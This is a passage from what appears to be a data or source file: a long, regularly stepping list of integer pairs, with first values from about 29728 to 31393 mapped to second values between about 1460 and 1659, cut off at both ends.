(29728, 1554),
(29729, 1554),
(29730, 1554),
(29731, 1555),
(29732, 1555),
(29733, 1555),
(29734, 1555),
(29735, 1555),
(29736, 1555),
(29737, 1556),
(29738, 1556),
(29739, 1556),
(29740, 1556),
(29741, 1556),
(29742, 1556),
(29743, 1557),
(29744, 1557),
(29745, 1557),
(29746, 1557),
(29747, 1557),
(29748, 1557),
(29749, 1558),
(29750, 1558),
(29751, 1558),
(29752, 1558),
(29753, 1558),
(29754, 1558),
(29755, 1559),
(29756, 1559),
(29757, 1559),
(29758, 1559),
(29759, 1559),
(29760, 1559),
(29761, 1460),
(29762, 1460),
(29763, 1461),
(29764, 1461),
(29765, 1462),
(29766, 1462),
(29767, 1463),
(29768, 1463),
(29769, 1464),
(29770, 1464),
(29771, 1465),
(29772, 1465),
(29773, 1466),
(29774, 1466),
(29775, 1467),
(29776, 1467),
(29777, 1468),
(29778, 1468),
(29779, 1469),
(29780, 1469),
(29781, 1470),
(29782, 1470),
(29783, 1471),
(29784, 1471),
(29785, 1472),
(29786, 1472),
(29787, 1473),
(29788, 1474),
(29789, 1474),
(29790, 1475),
(29791, 1475),
(29792, 1476),
(29793, 1476),
(29794, 1477),
(29795, 1477),
(29796, 1478),
(29797, 1478),
(29798, 1479),
(29799, 1479),
(29800, 1480),
(29801, 1480),
(29802, 1481),
(29803, 1481),
(29804, 1482),
(29805, 1482),
(29806, 1483),
(29807, 1483),
(29808, 1484),
(29809, 1484),
(29810, 1485),
(29811, 1485),
(29812, 1486),
(29813, 1486),
(29814, 1487),
(29815, 1487),
(29816, 1488),
(29817, 1488),
(29818, 1489),
(29819, 1490),
(29820, 1490),
(29821, 1491),
(29822, 1491),
(29823, 1492),
(29824, 1492),
(29825, 1493),
(29826, 1493),
(29827, 1494),
(29828, 1494),
(29829, 1495),
(29830, 1495),
(29831, 1496),
(29832, 1496),
(29833, 1497),
(29834, 1497),
(29835, 1498),
(29836, 1498),
(29837, 1499),
(29838, 1499),
(29839, 1500),
(29840, 1500),
(29841, 1501),
(29842, 1501),
(29843, 1502),
(29844, 1502),
(29845, 1503),
(29846, 1503),
(29847, 1504),
(29848, 1504),
(29849, 1505),
(29850, 1506),
(29851, 1506),
(29852, 1507),
(29853, 1507),
(29854, 1508),
(29855, 1508),
(29856, 1509),
(29857, 1509),
(29858, 1510),
(29859, 1510),
(29860, 1511),
(29861, 1511),
(29862, 1512),
(29863, 1512),
(29864, 1513),
(29865, 1513),
(29866, 1514),
(29867, 1514),
(29868, 1515),
(29869, 1515),
(29870, 1516),
(29871, 1516),
(29872, 1517),
(29873, 1517),
(29874, 1518),
(29875, 1518),
(29876, 1519),
(29877, 1519),
(29878, 1520),
(29879, 1520),
(29880, 1521),
(29881, 1522),
(29882, 1522),
(29883, 1523),
(29884, 1523),
(29885, 1524),
(29886, 1524),
(29887, 1525),
(29888, 1525),
(29889, 1526),
(29890, 1526),
(29891, 1527),
(29892, 1527),
(29893, 1528),
(29894, 1528),
(29895, 1529),
(29896, 1529),
(29897, 1530),
(29898, 1530),
(29899, 1531),
(29900, 1531),
(29901, 1532),
(29902, 1532),
(29903, 1533),
(29904, 1533),
(29905, 1534),
(29906, 1534),
(29907, 1535),
(29908, 1535),
(29909, 1536),
(29910, 1536),
(29911, 1537),
(29912, 1538),
(29913, 1538),
(29914, 1539),
(29915, 1539),
(29916, 1540),
(29917, 1540),
(29918, 1541),
(29919, 1541),
(29920, 1542),
(29921, 1542),
(29922, 1543),
(29923, 1543),
(29924, 1544),
(29925, 1544),
(29926, 1545),
(29927, 1545),
(29928, 1546),
(29929, 1546),
(29930, 1547),
(29931, 1547),
(29932, 1548),
(29933, 1548),
(29934, 1549),
(29935, 1549),
(29936, 1550),
(29937, 1550),
(29938, 1551),
(29939, 1551),
(29940, 1552),
(29941, 1552),
(29942, 1553),
(29943, 1554),
(29944, 1554),
(29945, 1555),
(29946, 1555),
(29947, 1556),
(29948, 1556),
(29949, 1557),
(29950, 1557),
(29951, 1558),
(29952, 1558),
(29953, 1559),
(29954, 1559),
(29955, 1560),
(29956, 1561),
(29957, 1562),
(29958, 1563),
(29959, 1564),
(29960, 1565),
(29961, 1566),
(29962, 1567),
(29963, 1568),
(29964, 1569),
(29965, 1570),
(29966, 1571),
(29967, 1572),
(29968, 1573),
(29969, 1574),
(29970, 1575),
(29971, 1576),
(29972, 1577),
(29973, 1578),
(29974, 1579),
(29975, 1580),
(29976, 1581),
(29977, 1582),
(29978, 1583),
(29979, 1584),
(29980, 1585),
(29981, 1586),
(29982, 1587),
(29983, 1588),
(29984, 1589),
(29985, 1590),
(29986, 1591),
(29987, 1592),
(29988, 1593),
(29989, 1594),
(29990, 1595),
(29991, 1596),
(29992, 1597),
(29993, 1598),
(29994, 1599),
(29995, 1600),
(29996, 1601),
(29997, 1602),
(29998, 1603),
(29999, 1604),
(30000, 1605),
(30001, 1606),
(30002, 1607),
(30003, 1608),
(30004, 1609),
(30005, 1610),
(30006, 1611),
(30007, 1612),
(30008, 1613),
(30009, 1614),
(30010, 1615),
(30011, 1616),
(30012, 1617),
(30013, 1618),
(30014, 1619),
(30015, 1620),
(30016, 1621),
(30017, 1622),
(30018, 1623),
(30019, 1624),
(30020, 1625),
(30021, 1626),
(30022, 1627),
(30023, 1628),
(30024, 1629),
(30025, 1630),
(30026, 1631),
(30027, 1632),
(30028, 1633),
(30029, 1634),
(30030, 1635),
(30031, 1636),
(30032, 1637),
(30033, 1638),
(30034, 1639),
(30035, 1640),
(30036, 1641),
(30037, 1642),
(30038, 1643),
(30039, 1644),
(30040, 1645),
(30041, 1646),
(30042, 1647),
(30043, 1648),
(30044, 1649),
(30045, 1650),
(30046, 1651),
(30047, 1652),
(30048, 1653),
(30049, 1654),
(30050, 1655),
(30051, 1656),
(30052, 1657),
(30053, 1658),
(30054, 1659),
(30055, 1560),
(30056, 1561),
(30057, 1561),
(30058, 1562),
(30059, 1563),
(30060, 1564),
(30061, 1564),
(30062, 1565),
(30063, 1566),
(30064, 1567),
(30065, 1567),
(30066, 1568),
(30067, 1569),
(30068, 1569),
(30069, 1570),
(30070, 1570),
(30071, 1571),
(30072, 1572),
(30073, 1573),
(30074, 1573),
(30075, 1574),
(30076, 1575),
(30077, 1576),
(30078, 1576),
(30079, 1577),
(30080, 1578),
(30081, 1579),
(30082, 1579),
(30083, 1580),
(30084, 1581),
(30085, 1582),
(30086, 1582),
(30087, 1583),
(30088, 1584),
(30089, 1585),
(30090, 1585),
(30091, 1586),
(30092, 1586),
(30093, 1586),
(30094, 1587),
(30095, 1588),
(30096, 1589),
(30097, 1589),
(30098, 1589),
(30099, 1590),
(30100, 1591),
(30101, 1592),
(30102, 1592),
(30103, 1592),
(30104, 1593),
(30105, 1594),
(30106, 1595),
(30107, 1595),
(30108, 1595),
(30109, 1596),
(30110, 1597),
(30111, 1598),
(30112, 1598),
(30113, 1598),
(30114, 1599),
(30115, 1600),
(30116, 1601),
(30117, 1601),
(30118, 1601),
(30119, 1602),
(30120, 1602),
(30121, 1603),
(30122, 1603),
(30123, 1603),
(30124, 1604),
(30125, 1605),
(30126, 1605),
(30127, 1606),
(30128, 1606),
(30129, 1606),
(30130, 1607),
(30131, 1608),
(30132, 1608),
(30133, 1609),
(30134, 1609),
(30135, 1609),
(30136, 1610),
(30137, 1611),
(30138, 1611),
(30139, 1612),
(30140, 1612),
(30141, 1612),
(30142, 1613),
(30143, 1614),
(30144, 1614),
(30145, 1615),
(30146, 1615),
(30147, 1615),
(30148, 1616),
(30149, 1617),
(30150, 1617),
(30151, 1617),
(30152, 1618),
(30153, 1618),
(30154, 1618),
(30155, 1619),
(30156, 1620),
(30157, 1621),
(30158, 1621),
(30159, 1621),
(30160, 1622),
(30161, 1623),
(30162, 1624),
(30163, 1624),
(30164, 1624),
(30165, 1625),
(30166, 1626),
(30167, 1627),
(30168, 1627),
(30169, 1627),
(30170, 1628),
(30171, 1629),
(30172, 1630),
(30173, 1630),
(30174, 1630),
(30175, 1631),
(30176, 1632),
(30177, 1633),
(30178, 1633),
(30179, 1633),
(30180, 1634),
(30181, 1634),
(30182, 1634),
(30183, 1635),
(30184, 1636),
(30185, 1637),
(30186, 1637),
(30187, 1637),
(30188, 1638),
(30189, 1639),
(30190, 1640),
(30191, 1640),
(30192, 1640),
(30193, 1641),
(30194, 1642),
(30195, 1643),
(30196, 1643),
(30197, 1643),
(30198, 1644),
(30199, 1645),
(30200, 1646),
(30201, 1646),
(30202, 1646),
(30203, 1647),
(30204, 1648),
(30205, 1649),
(30206, 1649),
(30207, 1649),
(30208, 1650),
(30209, 1650),
(30210, 1650),
(30211, 1650),
(30212, 1651),
(30213, 1652),
(30214, 1653),
(30215, 1653),
(30216, 1653),
(30217, 1653),
(30218, 1654),
(30219, 1655),
(30220, 1656),
(30221, 1656),
(30222, 1656),
(30223, 1656),
(30224, 1657),
(30225, 1658),
(30226, 1659),
(30227, 1659),
(30228, 1659),
(30229, 1659),
(30230, 1560),
(30231, 1560),
(30232, 1560),
(30233, 1560),
(30234, 1560),
(30235, 1560),
(30236, 1560),
(30237, 1561),
(30238, 1561),
(30239, 1561),
(30240, 1561),
(30241, 1561),
(30242, 1561),
(30243, 1561),
(30244, 1562),
(30245, 1562),
(30246, 1562),
(30247, 1562),
(30248, 1562),
(30249, 1562),
(30250, 1562),
(30251, 1563),
(30252, 1563),
(30253, 1563),
(30254, 1563),
(30255, 1563),
(30256, 1563),
(30257, 1563),
(30258, 1564),
(30259, 1564),
(30260, 1564),
(30261, 1564),
(30262, 1564),
(30263, 1564),
(30264, 1564),
(30265, 1565),
(30266, 1565),
(30267, 1565),
(30268, 1565),
(30269, 1565),
(30270, 1565),
(30271, 1565),
(30272, 1566),
(30273, 1566),
(30274, 1566),
(30275, 1566),
(30276, 1566),
(30277, 1566),
(30278, 1566),
(30279, 1567),
(30280, 1567),
(30281, 1567),
(30282, 1567),
(30283, 1567),
(30284, 1567),
(30285, 1567),
(30286, 1568),
(30287, 1568),
(30288, 1568),
(30289, 1568),
(30290, 1568),
(30291, 1568),
(30292, 1568),
(30293, 1569),
(30294, 1569),
(30295, 1569),
(30296, 1569),
(30297, 1569),
(30298, 1569),
(30299, 1569),
(30300, 1569),
(30301, 1569),
(30302, 1569),
(30303, 1569),
(30304, 1570),
(30305, 1570),
(30306, 1570),
(30307, 1570),
(30308, 1570),
(30309, 1570),
(30310, 1570),
(30311, 1571),
(30312, 1571),
(30313, 1571),
(30314, 1571),
(30315, 1571),
(30316, 1571),
(30317, 1571),
(30318, 1572),
(30319, 1572),
(30320, 1572),
(30321, 1572),
(30322, 1572),
(30323, 1572),
(30324, 1572),
(30325, 1573),
(30326, 1573),
(30327, 1573),
(30328, 1573),
(30329, 1573),
(30330, 1573),
(30331, 1573),
(30332, 1574),
(30333, 1574),
(30334, 1574),
(30335, 1574),
(30336, 1574),
(30337, 1574),
(30338, 1574),
(30339, 1575),
(30340, 1575),
(30341, 1575),
(30342, 1575),
(30343, 1575),
(30344, 1575),
(30345, 1575),
(30346, 1576),
(30347, 1576),
(30348, 1576),
(30349, 1576),
(30350, 1576),
(30351, 1576),
(30352, 1576),
(30353, 1577),
(30354, 1577),
(30355, 1577),
(30356, 1577),
(30357, 1577),
(30358, 1577),
(30359, 1577),
(30360, 1578),
(30361, 1578),
(30362, 1578),
(30363, 1578),
(30364, 1578),
(30365, 1578),
(30366, 1578),
(30367, 1579),
(30368, 1579),
(30369, 1579),
(30370, 1579),
(30371, 1579),
(30372, 1579),
(30373, 1579),
(30374, 1580),
(30375, 1580),
(30376, 1580),
(30377, 1580),
(30378, 1580),
(30379, 1580),
(30380, 1580),
(30381, 1581),
(30382, 1581),
(30383, 1581),
(30384, 1581),
(30385, 1581),
(30386, 1581),
(30387, 1581),
(30388, 1582),
(30389, 1582),
(30390, 1582),
(30391, 1582),
(30392, 1582),
(30393, 1582),
(30394, 1582),
(30395, 1583),
(30396, 1583),
(30397, 1583),
(30398, 1583),
(30399, 1583),
(30400, 1583),
(30401, 1583),
(30402, 1584),
(30403, 1584),
(30404, 1584),
(30405, 1584),
(30406, 1584),
(30407, 1584),
(30408, 1584),
(30409, 1585),
(30410, 1585),
(30411, 1585),
(30412, 1585),
(30413, 1585),
(30414, 1585),
(30415, 1585),
(30416, 1585),
(30417, 1585),
(30418, 1585),
(30419, 1585),
(30420, 1586),
(30421, 1586),
(30422, 1586),
(30423, 1586),
(30424, 1586),
(30425, 1586),
(30426, 1586),
(30427, 1587),
(30428, 1587),
(30429, 1587),
(30430, 1587),
(30431, 1587),
(30432, 1587),
(30433, 1587),
(30434, 1588),
(30435, 1588),
(30436, 1588),
(30437, 1588),
(30438, 1588),
(30439, 1588),
(30440, 1588),
(30441, 1589),
(30442, 1589),
(30443, 1589),
(30444, 1589),
(30445, 1589),
(30446, 1589),
(30447, 1589),
(30448, 1590),
(30449, 1590),
(30450, 1590),
(30451, 1590),
(30452, 1590),
(30453, 1590),
(30454, 1590),
(30455, 1591),
(30456, 1591),
(30457, 1591),
(30458, 1591),
(30459, 1591),
(30460, 1591),
(30461, 1591),
(30462, 1592),
(30463, 1592),
(30464, 1592),
(30465, 1592),
(30466, 1592),
(30467, 1592),
(30468, 1592),
(30469, 1593),
(30470, 1593),
(30471, 1593),
(30472, 1593),
(30473, 1593),
(30474, 1593),
(30475, 1593),
(30476, 1594),
(30477, 1594),
(30478, 1594),
(30479, 1594),
(30480, 1594),
(30481, 1594),
(30482, 1594),
(30483, 1595),
(30484, 1595),
(30485, 1595),
(30486, 1595),
(30487, 1595),
(30488, 1595),
(30489, 1595),
(30490, 1596),
(30491, 1596),
(30492, 1596),
(30493, 1596),
(30494, 1596),
(30495, 1596),
(30496, 1596),
(30497, 1597),
(30498, 1597),
(30499, 1597),
(30500, 1597),
(30501, 1597),
(30502, 1597),
(30503, 1597),
(30504, 1598),
(30505, 1598),
(30506, 1598),
(30507, 1598),
(30508, 1598),
(30509, 1598),
(30510, 1598),
(30511, 1599),
(30512, 1599),
(30513, 1599),
(30514, 1599),
(30515, 1599),
(30516, 1599),
(30517, 1599),
(30518, 1600),
(30519, 1600),
(30520, 1600),
(30521, 1600),
(30522, 1600),
(30523, 1600),
(30524, 1600),
(30525, 1601),
(30526, 1601),
(30527, 1601),
(30528, 1601),
(30529, 1601),
(30530, 1601),
(30531, 1601),
(30532, 1601),
(30533, 1601),
(30534, 1601),
(30535, 1601),
(30536, 1602),
(30537, 1602),
(30538, 1602),
(30539, 1602),
(30540, 1602),
(30541, 1602),
(30542, 1602),
(30543, 1603),
(30544, 1603),
(30545, 1603),
(30546, 1603),
(30547, 1603),
(30548, 1603),
(30549, 1603),
(30550, 1604),
(30551, 1604),
(30552, 1604),
(30553, 1604),
(30554, 1604),
(30555, 1604),
(30556, 1604),
(30557, 1605),
(30558, 1605),
(30559, 1605),
(30560, 1605),
(30561, 1605),
(30562, 1605),
(30563, 1605),
(30564, 1606),
(30565, 1606),
(30566, 1606),
(30567, 1606),
(30568, 1606),
(30569, 1606),
(30570, 1606),
(30571, 1607),
(30572, 1607),
(30573, 1607),
(30574, 1607),
(30575, 1607),
(30576, 1607),
(30577, 1607),
(30578, 1608),
(30579, 1608),
(30580, 1608),
(30581, 1608),
(30582, 1608),
(30583, 1608),
(30584, 1608),
(30585, 1609),
(30586, 1609),
(30587, 1609),
(30588, 1609),
(30589, 1609),
(30590, 1609),
(30591, 1609),
(30592, 1610),
(30593, 1610),
(30594, 1610),
(30595, 1610),
(30596, 1610),
(30597, 1610),
(30598, 1610),
(30599, 1611),
(30600, 1611),
(30601, 1611),
(30602, 1611),
(30603, 1611),
(30604, 1611),
(30605, 1611),
(30606, 1612),
(30607, 1612),
(30608, 1612),
(30609, 1612),
(30610, 1612),
(30611, 1612),
(30612, 1612),
(30613, 1613),
(30614, 1613),
(30615, 1613),
(30616, 1613),
(30617, 1613),
(30618, 1613),
(30619, 1613),
(30620, 1614),
(30621, 1614),
(30622, 1614),
(30623, 1614),
(30624, 1614),
(30625, 1614),
(30626, 1614),
(30627, 1615),
(30628, 1615),
(30629, 1615),
(30630, 1615),
(30631, 1615),
(30632, 1615),
(30633, 1615),
(30634, 1616),
(30635, 1616),
(30636, 1616),
(30637, 1616),
(30638, 1616),
(30639, 1616),
(30640, 1616),
(30641, 1617),
(30642, 1617),
(30643, 1617),
(30644, 1617),
(30645, 1617),
(30646, 1617),
(30647, 1617),
(30648, 1617),
(30649, 1617),
(30650, 1617),
(30651, 1617),
(30652, 1618),
(30653, 1618),
(30654, 1618),
(30655, 1618),
(30656, 1618),
(30657, 1618),
(30658, 1618),
(30659, 1619),
(30660, 1619),
(30661, 1619),
(30662, 1619),
(30663, 1619),
(30664, 1619),
(30665, 1619),
(30666, 1620),
(30667, 1620),
(30668, 1620),
(30669, 1620),
(30670, 1620),
(30671, 1620),
(30672, 1620),
(30673, 1621),
(30674, 1621),
(30675, 1621),
(30676, 1621),
(30677, 1621),
(30678, 1621),
(30679, 1621),
(30680, 1622),
(30681, 1622),
(30682, 1622),
(30683, 1622),
(30684, 1622),
(30685, 1622),
(30686, 1622),
(30687, 1623),
(30688, 1623),
(30689, 1623),
(30690, 1623),
(30691, 1623),
(30692, 1623),
(30693, 1623),
(30694, 1624),
(30695, 1624),
(30696, 1624),
(30697, 1624),
(30698, 1624),
(30699, 1624),
(30700, 1624),
(30701, 1625),
(30702, 1625),
(30703, 1625),
(30704, 1625),
(30705, 1625),
(30706, 1625),
(30707, 1625),
(30708, 1626),
(30709, 1626),
(30710, 1626),
(30711, 1626),
(30712, 1626),
(30713, 1626),
(30714, 1626),
(30715, 1627),
(30716, 1627),
(30717, 1627),
(30718, 1627),
(30719, 1627),
(30720, 1627),
(30721, 1627),
(30722, 1628),
(30723, 1628),
(30724, 1628),
(30725, 1628),
(30726, 1628),
(30727, 1628),
(30728, 1628),
(30729, 1629),
(30730, 1629),
(30731, 1629),
(30732, 1629),
(30733, 1629),
(30734, 1629),
(30735, 1629),
(30736, 1630),
(30737, 1630),
(30738, 1630),
(30739, 1630),
(30740, 1630),
(30741, 1630),
(30742, 1630),
(30743, 1631),
(30744, 1631),
(30745, 1631),
(30746, 1631),
(30747, 1631),
(30748, 1631),
(30749, 1631),
(30750, 1632),
(30751, 1632),
(30752, 1632),
(30753, 1632),
(30754, 1632),
(30755, 1632),
(30756, 1632),
(30757, 1633),
(30758, 1633),
(30759, 1633),
(30760, 1633),
(30761, 1633),
(30762, 1633),
(30763, 1633),
(30764, 1633),
(30765, 1633),
(30766, 1633),
(30767, 1633),
(30768, 1634),
(30769, 1634),
(30770, 1634),
(30771, 1634),
(30772, 1634),
(30773, 1634),
(30774, 1634),
(30775, 1635),
(30776, 1635),
(30777, 1635),
(30778, 1635),
(30779, 1635),
(30780, 1635),
(30781, 1635),
(30782, 1636),
(30783, 1636),
(30784, 1636),
(30785, 1636),
(30786, 1636),
(30787, 1636),
(30788, 1636),
(30789, 1637),
(30790, 1637),
(30791, 1637),
(30792, 1637),
(30793, 1637),
(30794, 1637),
(30795, 1637),
(30796, 1638),
(30797, 1638),
(30798, 1638),
(30799, 1638),
(30800, 1638),
(30801, 1638),
(30802, 1638),
(30803, 1639),
(30804, 1639),
(30805, 1639),
(30806, 1639),
(30807, 1639),
(30808, 1639),
(30809, 1639),
(30810, 1640),
(30811, 1640),
(30812, 1640),
(30813, 1640),
(30814, 1640),
(30815, 1640),
(30816, 1640),
(30817, 1641),
(30818, 1641),
(30819, 1641),
(30820, 1641),
(30821, 1641),
(30822, 1641),
(30823, 1641),
(30824, 1642),
(30825, 1642),
(30826, 1642),
(30827, 1642),
(30828, 1642),
(30829, 1642),
(30830, 1642),
(30831, 1643),
(30832, 1643),
(30833, 1643),
(30834, 1643),
(30835, 1643),
(30836, 1643),
(30837, 1643),
(30838, 1644),
(30839, 1644),
(30840, 1644),
(30841, 1644),
(30842, 1644),
(30843, 1644),
(30844, 1644),
(30845, 1645),
(30846, 1645),
(30847, 1645),
(30848, 1645),
(30849, 1645),
(30850, 1645),
(30851, 1645),
(30852, 1646),
(30853, 1646),
(30854, 1646),
(30855, 1646),
(30856, 1646),
(30857, 1646),
(30858, 1646),
(30859, 1647),
(30860, 1647),
(30861, 1647),
(30862, 1647),
(30863, 1647),
(30864, 1647),
(30865, 1647),
(30866, 1648),
(30867, 1648),
(30868, 1648),
(30869, 1648),
(30870, 1648),
(30871, 1648),
(30872, 1648),
(30873, 1649),
(30874, 1649),
(30875, 1649),
(30876, 1649),
(30877, 1649),
(30878, 1649),
(30879, 1649),
(30880, 1649),
(30881, 1649),
(30882, 1649),
(30883, 1649),
(30884, 1650),
(30885, 1650),
(30886, 1650),
(30887, 1650),
(30888, 1650),
(30889, 1650),
(30890, 1650),
(30891, 1651),
(30892, 1651),
(30893, 1651),
(30894, 1651),
(30895, 1651),
(30896, 1651),
(30897, 1651),
(30898, 1652),
(30899, 1652),
(30900, 1652),
(30901, 1652),
(30902, 1652),
(30903, 1652),
(30904, 1652),
(30905, 1653),
(30906, 1653),
(30907, 1653),
(30908, 1653),
(30909, 1653),
(30910, 1653),
(30911, 1653),
(30912, 1654),
(30913, 1654),
(30914, 1654),
(30915, 1654),
(30916, 1654),
(30917, 1654),
(30918, 1654),
(30919, 1655),
(30920, 1655),
(30921, 1655),
(30922, 1655),
(30923, 1655),
(30924, 1655),
(30925, 1655),
(30926, 1656),
(30927, 1656),
(30928, 1656),
(30929, 1656),
(30930, 1656),
(30931, 1656),
(30932, 1656),
(30933, 1657),
(30934, 1657),
(30935, 1657),
(30936, 1657),
(30937, 1657),
(30938, 1657),
(30939, 1657),
(30940, 1658),
(30941, 1658),
(30942, 1658),
(30943, 1658),
(30944, 1658),
(30945, 1658),
(30946, 1658),
(30947, 1659),
(30948, 1659),
(30949, 1659),
(30950, 1659),
(30951, 1659),
(30952, 1659),
(30953, 1659),
(30954, 1560),
(30955, 1561),
(30956, 1562),
(30957, 1563),
(30958, 1564),
(30959, 1565),
(30960, 1566),
(30961, 1567),
(30962, 1568),
(30963, 1569),
(30964, 1570),
(30965, 1571),
(30966, 1572),
(30967, 1573),
(30968, 1574),
(30969, 1575),
(30970, 1576),
(30971, 1577),
(30972, 1578),
(30973, 1579),
(30974, 1580),
(30975, 1581),
(30976, 1582),
(30977, 1583),
(30978, 1584),
(30979, 1585),
(30980, 1586),
(30981, 1587),
(30982, 1588),
(30983, 1589),
(30984, 1590),
(30985, 1591),
(30986, 1592),
(30987, 1593),
(30988, 1594),
(30989, 1595),
(30990, 1596),
(30991, 1597),
(30992, 1598),
(30993, 1599),
(30994, 1600),
(30995, 1601),
(30996, 1602),
(30997, 1603),
(30998, 1604),
(30999, 1605),
(31000, 1606),
(31001, 1607),
(31002, 1608),
(31003, 1609),
(31004, 1610),
(31005, 1611),
(31006, 1612),
(31007, 1613),
(31008, 1614),
(31009, 1615),
(31010, 1616),
(31011, 1617),
(31012, 1618),
(31013, 1619),
(31014, 1620),
(31015, 1621),
(31016, 1622),
(31017, 1623),
(31018, 1624),
(31019, 1625),
(31020, 1626),
(31021, 1627),
(31022, 1628),
(31023, 1629),
(31024, 1630),
(31025, 1631),
(31026, 1632),
(31027, 1633),
(31028, 1634),
(31029, 1635),
(31030, 1636),
(31031, 1637),
(31032, 1638),
(31033, 1639),
(31034, 1640),
(31035, 1641),
(31036, 1642),
(31037, 1643),
(31038, 1644),
(31039, 1645),
(31040, 1646),
(31041, 1647),
(31042, 1648),
(31043, 1649),
(31044, 1650),
(31045, 1651),
(31046, 1652),
(31047, 1653),
(31048, 1654),
(31049, 1655),
(31050, 1656),
(31051, 1657),
(31052, 1658),
(31053, 1659),
(31054, 1560),
(31055, 1560),
(31056, 1560),
(31057, 1560),
(31058, 1560),
(31059, 1560),
(31060, 1561),
(31061, 1561),
(31062, 1561),
(31063, 1561),
(31064, 1561),
(31065, 1561),
(31066, 1562),
(31067, 1562),
(31068, 1562),
(31069, 1562),
(31070, 1562),
(31071, 1562),
(31072, 1563),
(31073, 1563),
(31074, 1563),
(31075, 1563),
(31076, 1563),
(31077, 1563),
(31078, 1564),
(31079, 1564),
(31080, 1564),
(31081, 1564),
(31082, 1564),
(31083, 1564),
(31084, 1565),
(31085, 1565),
(31086, 1565),
(31087, 1565),
(31088, 1565),
(31089, 1565),
(31090, 1566),
(31091, 1566),
(31092, 1566),
(31093, 1566),
(31094, 1566),
(31095, 1566),
(31096, 1567),
(31097, 1567),
(31098, 1567),
(31099, 1567),
(31100, 1567),
(31101, 1567),
(31102, 1568),
(31103, 1568),
(31104, 1568),
(31105, 1568),
(31106, 1568),
(31107, 1568),
(31108, 1569),
(31109, 1569),
(31110, 1569),
(31111, 1569),
(31112, 1569),
(31113, 1569),
(31114, 1569),
(31115, 1569),
(31116, 1569),
(31117, 1570),
(31118, 1570),
(31119, 1570),
(31120, 1570),
(31121, 1570),
(31122, 1570),
(31123, 1571),
(31124, 1571),
(31125, 1571),
(31126, 1571),
(31127, 1571),
(31128, 1571),
(31129, 1572),
(31130, 1572),
(31131, 1572),
(31132, 1572),
(31133, 1572),
(31134, 1572),
(31135, 1573),
(31136, 1573),
(31137, 1573),
(31138, 1573),
(31139, 1573),
(31140, 1573),
(31141, 1574),
(31142, 1574),
(31143, 1574),
(31144, 1574),
(31145, 1574),
(31146, 1574),
(31147, 1575),
(31148, 1575),
(31149, 1575),
(31150, 1575),
(31151, 1575),
(31152, 1575),
(31153, 1576),
(31154, 1576),
(31155, 1576),
(31156, 1576),
(31157, 1576),
(31158, 1576),
(31159, 1577),
(31160, 1577),
(31161, 1577),
(31162, 1577),
(31163, 1577),
(31164, 1577),
(31165, 1578),
(31166, 1578),
(31167, 1578),
(31168, 1578),
(31169, 1578),
(31170, 1578),
(31171, 1579),
(31172, 1579),
(31173, 1579),
(31174, 1579),
(31175, 1579),
(31176, 1579),
(31177, 1580),
(31178, 1580),
(31179, 1580),
(31180, 1580),
(31181, 1580),
(31182, 1580),
(31183, 1581),
(31184, 1581),
(31185, 1581),
(31186, 1581),
(31187, 1581),
(31188, 1581),
(31189, 1582),
(31190, 1582),
(31191, 1582),
(31192, 1582),
(31193, 1582),
(31194, 1582),
(31195, 1583),
(31196, 1583),
(31197, 1583),
(31198, 1583),
(31199, 1583),
(31200, 1583),
(31201, 1584),
(31202, 1584),
(31203, 1584),
(31204, 1584),
(31205, 1584),
(31206, 1584),
(31207, 1585),
(31208, 1585),
(31209, 1585),
(31210, 1585),
(31211, 1585),
(31212, 1585),
(31213, 1585),
(31214, 1585),
(31215, 1585),
(31216, 1586),
(31217, 1586),
(31218, 1586),
(31219, 1586),
(31220, 1586),
(31221, 1586),
(31222, 1587),
(31223, 1587),
(31224, 1587),
(31225, 1587),
(31226, 1587),
(31227, 1587),
(31228, 1588),
(31229, 1588),
(31230, 1588),
(31231, 1588),
(31232, 1588),
(31233, 1588),
(31234, 1589),
(31235, 1589),
(31236, 1589),
(31237, 1589),
(31238, 1589),
(31239, 1589),
(31240, 1590),
(31241, 1590),
(31242, 1590),
(31243, 1590),
(31244, 1590),
(31245, 1590),
(31246, 1591),
(31247, 1591),
(31248, 1591),
(31249, 1591),
(31250, 1591),
(31251, 1591),
(31252, 1592),
(31253, 1592),
(31254, 1592),
(31255, 1592),
(31256, 1592),
(31257, 1592),
(31258, 1593),
(31259, 1593),
(31260, 1593),
(31261, 1593),
(31262, 1593),
(31263, 1593),
(31264, 1594),
(31265, 1594),
(31266, 1594),
(31267, 1594),
(31268, 1594),
(31269, 1594),
(31270, 1595),
(31271, 1595),
(31272, 1595),
(31273, 1595),
(31274, 1595),
(31275, 1595),
(31276, 1596),
(31277, 1596),
(31278, 1596),
(31279, 1596),
(31280, 1596),
(31281, 1596),
(31282, 1597),
(31283, 1597),
(31284, 1597),
(31285, 1597),
(31286, 1597),
(31287, 1597),
(31288, 1598),
(31289, 1598),
(31290, 1598),
(31291, 1598),
(31292, 1598),
(31293, 1598),
(31294, 1599),
(31295, 1599),
(31296, 1599),
(31297, 1599),
(31298, 1599),
(31299, 1599),
(31300, 1600),
(31301, 1600),
(31302, 1600),
(31303, 1600),
(31304, 1600),
(31305, 1600),
(31306, 1601),
(31307, 1601),
(31308, 1601),
(31309, 1601),
(31310, 1601),
(31311, 1601),
(31312, 1601),
(31313, 1601),
(31314, 1601),
(31315, 1602),
(31316, 1602),
(31317, 1602),
(31318, 1602),
(31319, 1602),
(31320, 1602),
(31321, 1603),
(31322, 1603),
(31323, 1603),
(31324, 1603),
(31325, 1603),
(31326, 1603),
(31327, 1604),
(31328, 1604),
(31329, 1604),
(31330, 1604),
(31331, 1604),
(31332, 1604),
(31333, 1605),
(31334, 1605),
(31335, 1605),
(31336, 1605),
(31337, 1605),
(31338, 1605),
(31339, 1606),
(31340, 1606),
(31341, 1606),
(31342, 1606),
(31343, 1606),
(31344, 1606),
(31345, 1607),
(31346, 1607),
(31347, 1607),
(31348, 1607),
(31349, 1607),
(31350, 1607),
(31351, 1608),
(31352, 1608),
(31353, 1608),
(31354, 1608),
(31355, 1608),
(31356, 1608),
(31357, 1609),
(31358, 1609),
(31359, 1609),
(31360, 1609),
(31361, 1609),
(31362, 1609),
(31363, 1610),
(31364, 1610),
(31365, 1610),
(31366, 1610),
(31367, 1610),
(31368, 1610),
(31369, 1611),
(31370, 1611),
(31371, 1611),
(31372, 1611),
(31373, 1611),
(31374, 1611),
(31375, 1612),
(31376, 1612),
(31377, 1612),
(31378, 1612),
(31379, 1612),
(31380, 1612),
(31381, 1613),
(31382, 1613),
(31383, 1613),
(31384, 1613),
(31385, 1613),
(31386, 1613),
(31387, 1614),
(31388, 1614),
(31389, 1614),
(31390, 1614),
(31391, 1614),
(31392, 1614),
(31393, 1615),
